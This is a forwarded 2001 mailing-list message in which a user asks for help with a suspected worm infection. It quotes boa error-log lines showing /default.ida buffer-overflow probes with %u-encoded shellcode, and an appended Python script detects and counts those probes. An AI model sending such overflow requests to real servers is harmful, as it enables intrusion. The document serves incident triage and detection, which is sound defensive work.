---------- Forwarded Message ----------
there's more though. but again I'm not sure.. for the first time I've seen a few odd requests being logged in boa, just a small snippet:

[07/Aug/2001:06:26:03 +0000] request from 195.38.105.70 "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780 1%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" ("/var/www/default.ida"): document open: No such file or directory
[07/Aug/2001:07:13:08 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:07:43:15 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:07:59:05 +0000] malformed request: "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.1"
[07/Aug/2001:08:17:28 +0000] request from 195.38.44.138 "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780 1%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" ("/var/www/default.ida"): document open: No such file or directory
[07/Aug/2001:08:31:51 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:08:57:30 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:09:08:55 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:09:13:38 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:09:20:26 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:09:29:23 +0000] bogus HTTP version: " HTTP/1.0"

this all seems rather coincidental.. and seems to confirm my idea of being infected with a virus/worm.. hope this helps (me, heh.. :)

On Tuesday 07 August 2001 18:40, William Leese wrote:
> I think my machine has been compromised though I'm not entirely sure.
>
> I suddenly saw a reasonable amount of traffic when I wasn't doing anything
> that could generate it, so I turned off all the net connection using
> applications and still there was traffic.
>
> Opened top to see if there was a process that wasn't terminated yet, nope..
> that wasn't it.
>
> Turned off networking.
>
> Tried netstat -ap and found to my great dismay that inetd had started the
> ftp service or at least that port was available. I accidentally installed
> wu-ftp a while ago but I thought I had removed it.. oh well. So, commented
> it out and restarted inetd.
>
> no luck.. the moment I started the networking script there was traffic.
>
> Turned off networking. But not before using Ethereal to capture a few
> packets.
>
> I've added an attachment with the log, could someone take a look at it and
> tell me what could be causing this.. it would seem like something (a worm
> or virus) is scanning the network looking for (vulnerable?) computers.
-------------------------------------------------------
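The entries quoted in the mail above are boa error-log lines. As an added example (not part of the original thread), the script below classifies such lines by the traits visible in them (a request for /default.ida whose query is X padding followed by %uXXXX escapes, a "malformed request" carrying the same payload, and the bare "bogus HTTP version" entries) and counts the probes per source address. The sample lines are constructed in the same format and use RFC 5737 documentation addresses, not the ones from the original log.

```python
import re
from collections import Counter

# Constructed sample lines in boa's error-log format, modelled on the entries
# quoted in the mail; addresses are RFC 5737 documentation addresses.
SAMPLE_LOG = """\
[07/Aug/2001:06:26:03 +0000] request from 192.0.2.10 "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" ("/var/www/default.ida"): document open: No such file or directory
[07/Aug/2001:07:13:08 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:07:59:05 +0000] malformed request: "XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.1"
[07/Aug/2001:08:17:28 +0000] request from 192.0.2.20 "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" ("/var/www/default.ida"): document open: No such file or directory
[07/Aug/2001:08:20:00 +0000] request from 192.0.2.30 "GET /index.html HTTP/1.0" ("/var/www/index.html"): document open: No such file or directory
"""

ENTRY_RE = re.compile(r'^\[(?P<ts>[^\]]+)\] (?P<msg>.*)$')
SOURCE_RE = re.compile(r'^request from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) ')
# A request for IIS's /default.ida whose query string is X padding followed by
# a run of %uXXXX escapes: nothing a normal client would send to a Unix boa.
IDA_RE = re.compile(r'/default\.ida\?X{8,}.*(?:%u[0-9a-fA-F]{4}){2,}', re.I)
UESCAPE_RE = re.compile(r'X{8,}(?:%u[0-9a-fA-F]{4}){2,}')

def classify(line):
    """Label one boa error-log line; returns (label, source_ip) or None if benign."""
    m = ENTRY_RE.match(line)
    if not m:
        return None
    msg = m.group('msg')
    src = SOURCE_RE.match(msg)
    ip = src.group('ip') if src else None  # boa logs no address for bogus/malformed lines
    if IDA_RE.search(msg):
        return ('ida-probe', ip)
    if msg.startswith('malformed request:') and UESCAPE_RE.search(msg):
        return ('ida-probe-fragment', ip)   # same payload, request line split or truncated
    if msg.startswith('bogus HTTP version:'):
        return ('bogus-version', ip)        # noise on its own; clusters with the probes
    return None

def summarize(log_text):
    """Count suspicious entries per label and .ida probes per source address."""
    labels, sources = Counter(), Counter()
    for line in log_text.splitlines():
        hit = classify(line)
        if hit is None:
            continue
        label, ip = hit
        labels[label] += 1
        if label == 'ida-probe' and ip:
            sources[ip] += 1
    return dict(labels), dict(sources)
```

Run against a real boa error log, the per-address counts separate the handful of hosts sending the probes from the unrelated file-not-found noise.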